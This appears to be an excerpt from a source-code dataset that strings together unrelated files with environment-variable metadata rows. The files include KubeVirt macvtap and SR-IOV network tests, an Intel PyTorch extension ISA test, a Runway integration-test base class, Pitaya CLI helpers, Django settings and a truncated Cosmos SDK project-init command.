Body([]byte(fmt.Sprintf(macvtapNetworkConf, macvtapNetworkName, tests.NamespaceTestDefault, macvtapLowerDevice, macvtapNetworkName))).
Do(context.Background())
Expect(result.Error()).NotTo(HaveOccurred(), "A macvtap network named %s should be provisioned", macvtapNetworkName)
})
AfterEach(func() {
tests.DisableFeatureGate(virtconfig.MacvtapGate)
})
newCirrosVMIWithMacvtapNetwork := func(macvtapNetworkName string) *v1.VirtualMachineInstance {
return libvmi.NewCirros(
libvmi.WithInterface(
*v1.DefaultMacvtapNetworkInterface(macvtapNetworkName)),
libvmi.WithNetwork(libvmi.MultusNetwork(macvtapNetworkName)))
}
newCirrosVMIWithExplicitMac := func(macvtapNetworkName string, mac string) *v1.VirtualMachineInstance {
return libvmi.NewCirros(
libvmi.WithInterface(
*libvmi.InterfaceWithMac(
v1.DefaultMacvtapNetworkInterface(macvtapNetworkName), mac)),
libvmi.WithNetwork(libvmi.MultusNetwork(macvtapNetworkName)))
}
newFedoraVMIWithExplicitMacAndGuestAgent := func(macvtapNetworkName string, mac string) *v1.VirtualMachineInstance {
return libvmi.NewTestToolingFedora(
libvmi.WithInterface(libvmi.InterfaceDeviceWithMasqueradeBinding()),
libvmi.WithInterface(
*libvmi.InterfaceWithMac(
v1.DefaultMacvtapNetworkInterface(macvtapNetworkName), mac)),
libvmi.WithNetwork(v1.DefaultPodNetwork()),
libvmi.WithCloudInitNoCloudUserData(tests.GetFedoraToolsGuestAgentUserData(), false),
libvmi.WithNetwork(libvmi.MultusNetwork(macvtapNetworkName)))
}
createCirrosVMIStaticIPOnNode := func(nodeName string, networkName string, ifaceName string, ipCIDR string, mac *string) *v1.VirtualMachineInstance {
var vmi *v1.VirtualMachineInstance
if mac != nil {
vmi = newCirrosVMIWithExplicitMac(networkName, *mac)
} else {
vmi = newCirrosVMIWithMacvtapNetwork(networkName)
}
vmi = tests.WaitUntilVMIReady(
tests.StartVmOnNode(vmi, nodeName),
console.LoginToCirros)
// configure the client VMI
Expect(configVMIInterfaceWithSudo(vmi, ifaceName, ipCIDR)).To(Succeed())
return vmi
}
createCirrosVMIRandomNode := func(networkName string, mac string) (*v1.VirtualMachineInstance, error) {
runningVMI := tests.RunVMIAndExpectLaunchWithIgnoreWarningArg(
newCirrosVMIWithExplicitMac(networkName, mac),
180,
false)
err := console.LoginToCirros(runningVMI)
return runningVMI, err
}
createFedoraVMIRandomNode := func(networkName string, mac string) (*v1.VirtualMachineInstance, error) {
runningVMI := tests.RunVMIAndExpectLaunchWithIgnoreWarningArg(
newFedoraVMIWithExplicitMacAndGuestAgent(networkName, mac),
180,
false)
err := console.LoginToFedora(runningVMI)
return runningVMI, err
}
Context("a virtual machine with one macvtap interface, with a custom MAC address", func() {
var serverVMI *v1.VirtualMachineInstance
var chosenMAC string
var nodeList *k8sv1.NodeList
var nodeName string
var serverIP string
BeforeEach(func() {
nodeList = tests.GetAllSchedulableNodes(virtClient)
Expect(nodeList.Items).NotTo(BeEmpty(), "schedulable kubernetes nodes must be present")
nodeName = nodeList.Items[0].Name
chosenMAC = "de:ad:00:00:be:af"
serverCIDR := "192.0.2.102/24"
var err error
serverIP, err = cidrToIP(serverCIDR)
Expect(err).ToNot(HaveOccurred())
serverVMI = createCirrosVMIStaticIPOnNode(nodeName, macvtapNetworkName, "eth0", serverCIDR, &chosenMAC)
})
It("should have the specified MAC address reported back via the API", func() {
Expect(len(serverVMI.Status.Interfaces)).To(Equal(1), "should have a single interface")
Expect(serverVMI.Status.Interfaces[0].MAC).To(Equal(chosenMAC), "the expected MAC address should be set in the VMI")
})
Context("and another virtual machine connected to the same network", func() {
var clientVMI *v1.VirtualMachineInstance
BeforeEach(func() {
clientVMI = createCirrosVMIStaticIPOnNode(nodeName, macvtapNetworkName, "eth0", "192.0.2.101/24", nil)
})
It("can communicate with the virtual machine in the same network", func() {
Expect(libnet.PingFromVMConsole(clientVMI, serverIP)).To(Succeed())
})
})
})
Context("VMI migration", func() {
var clientVMI *v1.VirtualMachineInstance
BeforeEach(func() {
tests.SkipIfMigrationIsNotPossible()
})
BeforeEach(func() {
macAddress := "02:03:04:05:06:07"
clientVMI, err = createCirrosVMIRandomNode(macvtapNetworkName, macAddress)
Expect(err).NotTo(HaveOccurred(), "must succeed creating a VMI on a random node")
})
It("should be successful when the VMI MAC address is defined in its spec", func() {
By("starting the migration")
migration := tests.NewRandomMigration(clientVMI.Name, clientVMI.Namespace)
migrationUID := tests.RunMigrationAndExpectCompletion(virtClient, migration, tests.MigrationWaitTime)
// check VMI, confirm migration state
tests.ConfirmVMIPostMigration(virtClient, clientVMI, migrationUID)
})
Context("with live traffic", func() {
var serverVMI *v1.VirtualMachineInstance
var serverIP string
getVMMacvtapIfaceIP := func(vmi *v1.VirtualMachineInstance, macAddress string) (string, error) {
var vmiIP string
err := wait.PollImmediate(time.Second, 2*time.Minute, func() (done bool, err error) {
vmi, err := virtClient.VirtualMachineInstance(vmi.Namespace).Get(vmi.Name, &v13.GetOptions{})
if err != nil {
return false, err
}
for _, iface := range vmi.Status.Interfaces {
if iface.MAC == macAddress {
vmiIP = iface.IP
return true, nil
}
}
return false, nil
})
if err != nil {
return "", err
}
return vmiIP, nil
}
BeforeEach(func() {
macAddress := "02:03:04:05:06:aa"
serverVMI, err = createFedoraVMIRandomNode(macvtapNetworkName, macAddress)
Expect(err).NotTo(HaveOccurred(), "must have succeeded creating a fedora VMI on a random node")
Expect(serverVMI.Status.Interfaces).NotTo(BeEmpty(), "a migrate-able VMI must have network interfaces")
serverIP, err = getVMMacvtapIfaceIP(serverVMI, macAddress)
Expect(err).NotTo(HaveOccurred(), "should have managed to figure out the IP of the server VMI")
})
BeforeEach(func() {
Expect(libnet.PingFromVMConsole(clientVMI, serverIP)).To(Succeed(), "connectivity is expected *before* migrating the VMI")
})
It("should keep connectivity after a migration", func() {
migration := tests.NewRandomMigration(serverVMI.Name, serverVMI.GetNamespace())
_ = tests.RunMigrationAndExpectCompletion(virtClient, migration, tests.MigrationWaitTime)
Expect(libnet.PingFromVMConsole(clientVMI, serverIP)).To(Succeed(), "connectivity is expected *after* migrating the VMI")
})
})
})
})
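// cidrToIP returns the IP address portion of a CIDR string (e.g. "192.168.1.1/24" -> "192.168.1.1").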
func cidrToIP(cidr string) (string, error) {
ip, _, err := net.ParseCIDR(cidr)
if err != nil {
return "", err
}
return ip.String(), nil
}
func configVMIInterfaceWithSudo(vmi *v1.VirtualMachineInstance, interfaceName, interfaceAddress string) error {
return configInterface(vmi, interfaceName, interfaceAddress, "sudo ")
}
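// configInterface assigns a static address to the named guest interface (optionally via sudo) and brings the link up.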
func configInterface(vmi *v1.VirtualMachineInstance, interfaceName, interfaceAddress string, userModifierPrefix ...string) error {
setStaticIpCmd := fmt.Sprintf("%sip addr add %s dev %s\n", strings.Join(userModifierPrefix, " "), interfaceAddress, interfaceName)
err := runSafeCommand(vmi, setStaticIpCmd)
if err != nil {
return fmt.Errorf("could not configure address %s for interface %s on VMI %s: %w", interfaceAddress, interfaceName, vmi.Name, err)
}
return setInterfaceUp(vmi, interfaceName)
}
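// checkInterface verifies that the named link exists inside the guest.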
func checkInterface(vmi *v1.VirtualMachineInstance, interfaceName string) error {
cmdCheck := fmt.Sprintf("ip link show %s\n", interfaceName)
err := runSafeCommand(vmi, cmdCheck)
if err != nil {
return fmt.Errorf("could not check interface: interface %s was not found in the VMI %s: %w", interfaceName, vmi.Name, err)
}
return nil
}
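// checkMacAddress verifies that the named guest interface reports the expected MAC address.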
func checkMacAddress(vmi *v1.VirtualMachineInstance, interfaceName, macAddress string) error {
cmdCheck := fmt.Sprintf("ip link show %s\n", interfaceName)
err := console.SafeExpectBatch(vmi, []expect.Batcher{
&expect.BSnd{S: "\n"},
&expect.BExp{R: console.PromptExpression},
&expect.BSnd{S: cmdCheck},
&expect.BExp{R: macAddress},
&expect.BSnd{S: "echo $?\n"},
&expect.BExp{R: console.RetValue("0")},
}, 15)
if err != nil {
return fmt.Errorf("could not check mac address of interface %s: MAC %s was not found in the VMI %s: %w", interfaceName, macAddress, vmi.Name, err)
}
return nil
}
func setInterfaceUp(vmi *v1.VirtualMachineInstance, interfaceName string) error {
setUpCmd := fmt.Sprintf("ip link set %s up\n", interfaceName)
err := runSafeCommand(vmi, setUpCmd)
if err != nil {
return fmt.Errorf("could not set interface %s up on VMI %s: %w", interfaceName, vmi.Name, err)
}
return nil
}
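// runSafeCommand runs a command on the VMI console and fails unless it exits with status 0.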
func runSafeCommand(vmi *v1.VirtualMachineInstance, command string) error {
return console.SafeExpectBatch(vmi, []expect.Batcher{
&expect.BSnd{S: "\n"},
&expect.BExp{R: console.PromptExpression},
&expect.BSnd{S: command},
&expect.BExp{R: console.PromptExpression},
&expect.BSnd{S: "echo $?\n"},
&expect.BExp{R: console.RetValue("0")},
}, 15)
}
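// getInterfaceNameByMAC returns the guest interface name of the VMI status interface carrying the given MAC address.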
func getInterfaceNameByMAC(vmi *v1.VirtualMachineInstance, mac string) (string, error) {
for _, iface := range vmi.Status.Interfaces {
if iface.MAC == mac {
return iface.InterfaceName, nil
}
}
return "", fmt.Errorf("could not get sriov interface by MAC: no interface on VMI %s with MAC %s", vmi.Name, mac)
}
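// getInterfaceNetworkNameByMAC returns the logical network name of the VMI status interface with the given MAC address, or an empty string if none matches.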
func getInterfaceNetworkNameByMAC(vmi *v1.VirtualMachineInstance, macAddress string) string {
for _, iface := range vmi.Status.Interfaces {
if iface.MAC == macAddress {
return iface.Name
}
}
return ""
}
// Tests in the Multus suite expect a Linux bridge to be available on each node, with iptables allowing
// traffic to go through. This function creates a DaemonSet on the cluster (if it does not exist yet); that
// DaemonSet creates a Linux bridge and configures the firewall. We use iptables-compat in order to work with
// both iptables and newer nftables.
// TODO: Once kubernetes-nmstate is ready, we should use it instead
func configureNodeNetwork(virtClient kubecli.KubevirtClient) {
	// Fetching the virt-handler image from a running pod makes this independent of the installation method / image used
pods, err := virtClient.CoreV1().Pods(flags.KubeVirtInstallNamespace).List(context.Background(), metav1.ListOptions{LabelSelector: "kubevirt.io=virt-handler"})
Expect(err).ToNot(HaveOccurred())
Expect(pods.Items).ToNot(BeEmpty())
virtHandlerImage := pods.Items[0].Spec.Containers[0].Image
// Privileged DaemonSet configuring host networking as needed
networkConfigDaemonSet := appsv1.DaemonSet{
TypeMeta: metav1.TypeMeta{
APIVersion: "apps/v1",
Kind: "DaemonSet",
},
ObjectMeta: metav1.ObjectMeta{
Name: "network-config",
Namespace: metav1.NamespaceSystem,
},
Spec: appsv1.DaemonSetSpec{
Selector: &metav1.LabelSelector{
MatchLabels: map[string]string{"name": "network-config"},
},
Template: k8sv1.PodTemplateSpec{
ObjectMeta: metav1.ObjectMeta{
Labels: map[string]string{"name": "network-config"},
},
Spec: k8sv1.PodSpec{
Containers: []k8sv1.Container{
{
Name: "network-config",
// Reuse image which is already installed in the cluster. All we need is chroot.
// Local OKD cluster doesn't allow us to pull from the outside.
Image: virtHandlerImage,
Command: []string{
"sh",
"-c",
"set -x; chroot /host ip link add br10 type bridge; chroot /host iptables -I FORWARD 1 -i br10 -j ACCEPT; touch /tmp/ready; sleep INF",
},
SecurityContext: &k8sv1.SecurityContext{
Privileged: pointer.BoolPtr(true),
RunAsUser: pointer.Int64Ptr(0),
},
ReadinessProbe: &k8sv1.Probe{
Handler: k8sv1.Handler{
Exec: &k8sv1.ExecAction{
Command: []string{"cat", "/tmp/ready"},
},
},
},
VolumeMounts: []k8sv1.VolumeMount{
{
Name: "host",
MountPath: "/host",
},
},
},
},
Volumes: []k8sv1.Volume{
{
Name: "host",
VolumeSource: k8sv1.VolumeSource{
HostPath: &k8sv1.HostPathVolumeSource{
Path: "/",
},
},
},
},
HostNetwork: true,
},
},
},
}
	// Helper function returning the existing network-config DaemonSet if it exists
getNetworkConfigDaemonSet := func() *appsv1.DaemonSet {
daemonSet, err := virtClient.AppsV1().DaemonSets(metav1.NamespaceSystem).Get(context.Background(), networkConfigDaemonSet.Name, metav1.GetOptions{})
if errors.IsNotFound(err) {
return nil
}
Expect(err).NotTo(HaveOccurred())
return daemonSet
}
	// If the DaemonSet hasn't been created yet, create it
runningNetworkConfigDaemonSet := getNetworkConfigDaemonSet()
if runningNetworkConfigDaemonSet == nil {
_, err := virtClient.AppsV1().DaemonSets(metav1.NamespaceSystem).Create(context.Background(), &networkConfigDaemonSet, metav1.CreateOptions{})
Expect(err).NotTo(HaveOccurred())
}
// Make sure that all pods in the Daemon Set finished the configuration
nodes := tests.GetAllSchedulableNodes(virtClient)
Eventually(func() int {
daemonSet := getNetworkConfigDaemonSet()
return int(daemonSet.Status.NumberAvailable)
}, time.Minute, time.Second).Should(Equal(len(nodes.Items)))
}
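// validateSRIOVSetup returns an error unless at least minRequiredNodes schedulable nodes expose an allocatable amount of the given SR-IOV resource.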
func validateSRIOVSetup(virtClient kubecli.KubevirtClient, sriovResourceName string, minRequiredNodes int) error {
nodes := tests.GetAllSchedulableNodes(virtClient)
Expect(nodes.Items).ToNot(BeEmpty(), "There should be some compute node")
var sriovEnabledNode int
for _, node := range nodes.Items {
resourceList := node.Status.Allocatable
for k, v := range resourceList {
if string(k) == sriovResourceName {
if v.Value() > 0 {
sriovEnabledNode++
break
}
}
}
}
if sriovEnabledNode < minRequiredNodes {
return fmt.Errorf("not enough compute nodes with SR-IOV support detected")
}
return nil
}
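// validatePodKubevirtResourceName checks that the KUBEVIRT_RESOURCE_NAME_<networkName> environment variable in the virt-launcher compute container matches the expected SR-IOV resource name.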
func validatePodKubevirtResourceName(virtClient kubecli.KubevirtClient, vmiPod *k8sv1.Pod, networkName, sriovResourceName string) error {
out, err := tests.ExecuteCommandOnPod(
virtClient,
vmiPod,
"compute",
[]string{"sh", "-c", fmt.Sprintf("echo $KUBEVIRT_RESOURCE_NAME_%s", networkName)},
)
if err != nil {
return err
}
out = strings.TrimSuffix(out, "\n")
if out != sriovResourceName {
return fmt.Errorf("env settings %s didnt match %s", out, sriovResourceName)
}
return nil
}
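// defaultCloudInitNetworkData returns the default cloud-init network data used by the SR-IOV tests.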
func defaultCloudInitNetworkData() string {
networkData, err := libnet.CreateDefaultCloudInitNetworkData()
ExpectWithOffset(1, err).ToNot(HaveOccurred(), "should successfully create default cloud init network data for SRIOV")
return networkData
}
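// cloudInitNetworkDataWithStaticIPsByMac builds cloud-init network data that assigns a static address to the NIC matched by MAC address.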
func cloudInitNetworkDataWithStaticIPsByMac(nicName, macAddress, ipAddress string) string {
networkData, err := libnet.NewNetworkData(
libnet.WithEthernet(nicName,
libnet.WithAddresses(ipAddress),
libnet.WithNameserverFromCluster(),
libnet.WithMatchingMAC(macAddress),
),
)
ExpectWithOffset(1, err).ToNot(HaveOccurred(), "should successfully create static IPs by mac address cloud init network data")
return networkData
}
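// cloudInitNetworkDataWithStaticIPsByDevice builds cloud-init network data that assigns a static address to the NIC matched by device name.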
func cloudInitNetworkDataWithStaticIPsByDevice(deviceName, ipAddress string) string {
networkData, err := libnet.NewNetworkData(
libnet.WithEthernet(deviceName,
libnet.WithAddresses(ipAddress),
libnet.WithNameserverFromCluster(),
),
)
ExpectWithOffset(1, err).ToNot(HaveOccurred(), "should successfully create static IPs by device name cloud init network data")
return networkData
}
| [
"\"SRIOV_RESOURCE_NAME\""
]
| []
| [
"SRIOV_RESOURCE_NAME"
]
| [] | ["SRIOV_RESOURCE_NAME"] | go | 1 | 0 | |
tests/cpu/test_dyndisp.py | import unittest
import os
import intel_extension_for_pytorch._C as core
def get_ipex_isa_env_setting():
env_isa = os.getenv('ATEN_CPU_CAPABILITY')
return env_isa
def get_current_isa_level():
    return core._get_current_isa_level().lower()
class TestDynDisp(unittest.TestCase):
def test_env_setting(self):
env_isa = get_ipex_isa_env_setting()
        cur_isa = get_current_isa_level()
        if env_isa is None:
return
self.assertEqual(env_isa.lower(), cur_isa.lower())
def test_dyndisp_in_supported_set(self):
env_isa = get_ipex_isa_env_setting()
        if env_isa is not None:
return
        cur_isa = get_current_isa_level()
supported_isa_set = ["default", "avx2", "avx512"]
expected_isa = cur_isa in supported_isa_set
self.assertTrue(expected_isa)
if __name__ == '__main__':
unittest.main() | []
| []
| [
"ATEN_CPU_CAPABILITY"
]
| [] | ["ATEN_CPU_CAPABILITY"] | python | 1 | 0 | |
integration_tests/integration_test.py | """Integration test module."""
import errno
import os
import shutil
import subprocess
import sys
from copy import deepcopy
import yaml
from send2trash import send2trash
from runway.util import change_dir
class IntegrationTest(object):
"""Base class for Integration Tests.
Attributes:
REQUIRED_FIXTURE_FILES (List[str]): List of fixture files that
will be copied to the current ``working_dir`` from
``fixture_dir`` when using the ``copy_fixtures`` method.
fixture_dir (str): Path to ``fixture`` directory relative to
``working_dir``.
tests_dir (str): Path to ``tests`` directory relative to
``working_dir``.
working_dir (str): Path that the test is running in.
"""
REQUIRED_FIXTURE_FILES = []
def __init__(self, logger, env_vars=None):
"""Initialize base class."""
self.logger = logger
self.environment = deepcopy(env_vars or os.environ)
self.runway_config_path = None
# roundabout way to get the file path of a subclass
self.working_dir = os.path.abspath(os.path.dirname(
sys.modules[self.__module__].__file__
))
self.fixture_dir = os.path.join(self.working_dir, 'fixtures')
self.tests_dir = os.path.join(self.working_dir, 'tests')
def copy_fixtures(self):
"""Copy fixtures to the root of the tests dir."""
self.logger.info('Fixtures defined for tests: %s',
str(self.REQUIRED_FIXTURE_FILES))
for fixture in self.REQUIRED_FIXTURE_FILES:
src = os.path.join(self.fixture_dir, fixture)
dest = os.path.join(self.working_dir, fixture)
if os.path.isfile(src):
self.logger.info('Copying "%s" to "%s"...', src, dest)
shutil.copy(src, dest)
def cleanup_fixtures(self):
"""Delete copied fixtures."""
for fixture in self.REQUIRED_FIXTURE_FILES:
fixture_path = os.path.join(self.working_dir, fixture)
self.logger.info('Deleting "%s"...', fixture_path)
try:
send2trash(fixture_path)
except OSError as err:
if err.errno == errno.ENOENT or 'not found' in str(err):
continue
raise
def parse_config(self, path):
"""Read and parse yml."""
if not os.path.isfile(path):
self.logger.error("Config file was not found (looking for \"%s\")",
path)
with open(path) as data_file:
return yaml.safe_load(data_file)
def runway_cmd(self, action, env_vars=None, tags=None, timeout=300, *args):
"""Run a deploy command based on tags.
Args:
action (str): Runway action. (e.g. ``deploy``, ``destroy``)
env_vars (Optional[Dict[str, str]]): Can be used to override
environment variables for the invocation.
tags (Optional[List[str]]): List of tag options to pass to Runway.
timeout (int): Seconds to wait for process to complete.
args (str): Additional arguments to add to the command. These
                are placed after any ``--tag`` options.
Returns:
Tuple[int, str, str]: The return code, ``stdout``, and ``stderr``
of the process.
"""
cmd = ['runway', action]
if tags:
for tag in tags:
cmd.extend(['--tag', tag])
cmd.extend(args)
self.logger.info('Running command: %s', str(cmd))
with change_dir(self.working_dir):
cmd_process = subprocess.Popen(cmd, env=env_vars or self.environment,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
stdout, stderr = cmd_process.communicate(timeout=timeout)
return cmd_process.returncode, stdout.decode(), stderr.decode()
def set_environment(self, env):
"""Set deploy environment."""
self.logger.info('Setting "DEPLOY_ENVIRONMENT" to "%s"', env)
if isinstance(env, str):
self.environment['DEPLOY_ENVIRONMENT'] = env
def set_env_var(self, var_name, var):
"""Set an environment variable"""
self.logger.info('Setting "%s" to "%s"', var_name, var)
if not isinstance(var, dict):
env = {}
env[var_name] = var
self.environment.update(env)
def unset_env_var(self, var):
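        """Unset an environment variable."""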
self.logger.info('Unsetting "%s" Environment Variable', var)
del self.environment[var]
def run(self):
"""Implement dummy method (set in consuming classes)."""
raise NotImplementedError('You must implement the run() method '
'yourself!')
def teardown(self):
"""Implement dummy method (set in consuming classes)."""
raise NotImplementedError('You must implement the teardown() method '
'yourself!')
| []
| []
| []
| [] | [] | python | 0 | 0 | |
helpers.go | // Copyright (c) TFG Co. All Rights Reserved.
//
// Permission is hereby granted, free of charge, to any person obtaining a copy
// of this software and associated documentation files (the "Software"), to deal
// in the Software without restriction, including without limitation the rights
// to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
// copies of the Software, and to permit persons to whom the Software is
// furnished to do so, subject to the following conditions:
//
// The above copyright notice and this permission notice shall be included in all
// copies or substantial portions of the Software.
//
// THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
// IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
// FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
// AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
// LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
// OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
// SOFTWARE.
package main
import (
"crypto/tls"
"encoding/json"
"fmt"
"os"
"github.com/mitchellh/go-homedir"
"github.com/sirupsen/logrus"
"github.com/tutumagi/pitaya/client"
"gopkg.in/abiosoft/ishell.v2"
)
func protoClient(log Log, addr string) error {
log.Println("Using protobuf client")
protoclient := client.NewProto(docsString, logrus.InfoLevel)
pClient = protoclient
for k, v := range pushInfo {
protoclient.AddPushResponse(k, v)
}
if err := protoclient.LoadServerInfo(addr); err != nil {
log.Println("Failed to load server info")
return err
}
return nil
}
func tryConnect(addr string) error {
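	// Fall back through connection modes in order: websocket with TLS (certificate verification disabled), plain websocket, TCP with TLS, then plain TCP.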
if err := pClient.ConnectToWS(addr, "", &tls.Config{
InsecureSkipVerify: true,
}); err != nil {
if err := pClient.ConnectToWS(addr, ""); err != nil {
if err := pClient.ConnectTo(addr, &tls.Config{
InsecureSkipVerify: true,
}); err != nil {
if err := pClient.ConnectTo(addr); err != nil {
return err
}
}
}
}
return nil
}
func readServerMessages(callback func(data []byte)) {
channel := pClient.MsgChannel()
for {
select {
case <-disconnectedCh:
close(disconnectedCh)
return
case m := <-channel:
callback(parseData(m.Data))
}
}
}
func configure(c *ishell.Shell) {
historyPath := os.Getenv("PITAYACLI_HISTORY_PATH")
if historyPath == "" {
home, _ := homedir.Dir()
historyPath = fmt.Sprintf("%s/.pitayacli_history", home)
}
c.SetHistoryPath(historyPath)
}
func parseData(data []byte) []byte {
if prettyJSON {
var m interface{}
_ = json.Unmarshal(data, &m)
data, _ = json.MarshalIndent(m, "", "\t")
}
return data
}
| [
"\"PITAYACLI_HISTORY_PATH\""
]
| []
| [
"PITAYACLI_HISTORY_PATH"
]
| [] | ["PITAYACLI_HISTORY_PATH"] | go | 1 | 0 | |
backend/settings.py | """
Django settings for backend project.
Generated by 'django-admin startproject' using Django 2.1.7.
For more information on this file, see
https://docs.djangoproject.com/en/2.1/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/2.1/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/2.1/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
# .sec is loaded in virtualenv activation. SECRET_KEY is there
SECRET_KEY = os.environ.get("SECRET_KEY")
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'django_extensions',
'rest_framework',
'silk',
'users.apps.UsersConfig',
'data_api.apps.DataApiConfig',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'silk.middleware.SilkyMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'backend.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'backend.wsgi.application'
# Database
# https://docs.djangoproject.com/en/2.1/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/2.1/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/2.1/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/2.1/howto/static-files/
STATIC_URL = '/static/'
REST_FRAMEWORK = {
'DEFAULT_AUTHENTICATION_CLASSES': (
'rest_framework.authentication.BasicAuthentication',
'rest_framework.authentication.SessionAuthentication',
),
'DEFAULT_PAGINATION_CLASS': 'rest_framework.pagination.PageNumberPagination',
'PAGE_SIZE': 10
}
| []
| []
| [
"SECRET_KEY"
]
| [] | ["SECRET_KEY"] | python | 1 | 0 | |
manage.py | #!/usr/bin/env python
import os
import sys
if __name__ == "__main__":
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "MyFirstSite.settings")
from django.core.management import execute_from_command_line
execute_from_command_line(sys.argv)
| []
| []
| []
| [] | [] | python | 0 | 0 | |
cmd/cosmos-sdk-cli/cmd/init.go | package cmd
import (
"fmt"
"go/build"
"io/ioutil"
"os"
"strings"
"github.com/cosmos/cosmos-sdk/version"
"github.com/spf13/cobra"
tmversion "github.com/tendermint/tendermint/version"
"path/filepath"
)
var remoteBasecoinPath = "github.com/cosmos/cosmos-sdk/examples/basecoin"
// Replacer to replace all instances of basecoin/basecli/BasecoinApp to project specific names
// Gets initialized when initCmd is executing after getting the project name from user
var replacer *strings.Replacer
// Remote path for the project.
var remoteProjectPath string
func init() {
initCmd.Flags().StringVarP(&remoteProjectPath, "project-path", "p", "", "Remote project path. eg: github.com/your_user_name/project_name")
rootCmd.AddCommand(initCmd)
}
var initCmd = &cobra.Command{
Use: "init [ProjectName]",
Short: "Initialize your new cosmos zone",
Args: cobra.ExactArgs(1),
RunE: func(cmd *cobra.Command, args []string) error {
fmt.Print("Thanks for choosing Cosmos-SDK to build your project.\n\n")
projectName := args[0]
capitalizedProjectName := strings.Title(projectName)
shortProjectName := strings.ToLower(projectName)
remoteProjectPath = strings.ToLower(strings.TrimSpace(remoteProjectPath))
if remoteProjectPath == "" {
remoteProjectPath = strings.ToLower(shortProjectName)
}
replacer = strings.NewReplacer("basecli", shortProjectName+"cli",
"basecoind", shortProjectName+"d",
"BasecoinApp", capitalizedProjectName+"App",
remoteBasecoinPath, remoteProjectPath,
"basecoin", shortProjectName,
"Basecoin", capitalizedProjectName)
return setupBasecoinWorkspace(shortProjectName, remoteProjectPath)
},
}
func resolveProjectPath(remoteProjectPath string) string {
gopath := os.Getenv("GOPATH")
if gopath == "" {
		// build.Default.GOPATH falls back to $HOME/go when GOPATH is unset.
		gopath = build.Default.GOPATH
}
return gopath + string(os.PathSeparator) + "src" + string(os.PathSeparator) + remoteProjectPath
}
func copyBasecoinTemplate(projectName string, projectPath string, remoteProjectPath string) {
basecoinProjectPath := resolveProjectPath(remoteBasecoinPath)
filepath.Walk(basecoinProjectPath, func(path string, f os.FileInfo, err error) error {
if !f.IsDir() {
data, err := ioutil.ReadFile(path)
if err != nil {
return err
}
contents := string(data)
// Extract relative file path eg: app/app.go instead of /Users/..../github.com/cosmos/...examples/basecoin/app/app.go
relativeFilePath := path[len(basecoinProjectPath)+1:]
// Evaluating the filepath in the new project folder
projectFilePath := projectPath + string(os.PathSeparator) + relativeFilePath
projectFilePath = replacer.Replace(projectFilePath)
lengthOfRootDir := strings.LastIndex(projectFilePath, string(os.PathSeparator))
// Extracting the path of root directory from the filepath
rootDir := projectFilePath[0:lengthOfRootDir]
// Creating the required directory first
os.MkdirAll(rootDir, os.ModePerm)
fmt.Println("Creating " + projectFilePath)
// Writing the contents to a file in the project folder
contents = replacer.Replace(contents)
ioutil.WriteFile(projectFilePath, []byte(contents), os.ModePerm)
}
return nil
})
}
func createGopkg(projectPath string) {
// Create gopkg.toml file
dependencies := map[string]string{
"github.com/cosmos/cosmos-sdk": "=" + version.Version,
"github.com/stretchr/testify": "=1.2.1",
"github.com/spf13/cobra": "=0.0.1",
"github.com/spf13/viper": "=1.0.0",
}
overrides := map[string]string{
"github.com/golang/protobuf": "1.1.0",
"github.com/tendermint/tendermint": tmversion.Version,
}
contents := ""
for dependency, version := range dependencies {
contents += "[[constraint]]\n\tname = \"" + dependency + "\"\n\tversion = \"" + version + "\"\n\n"
}
for dependency, version := range overrides {
contents += "[[override]]\n\tname = \"" + dependency + "\"\n\tversion = \"=" + version + "\"\n\n"
}
contents += "[prune]\n\tgo-tests = true\n\tunused-packages = true"
ioutil.WriteFile(projectPath+"/Gopkg.toml", []byte(contents), os.ModePerm)
}
func createMakefile(projectPath string) {
// Create makefile
// TODO: Should we use tools/ directory as in Cosmos-SDK to get tools for linting etc.
makefileContents := `PACKAGES=$(shell go list ./... | grep -v '/vendor/')
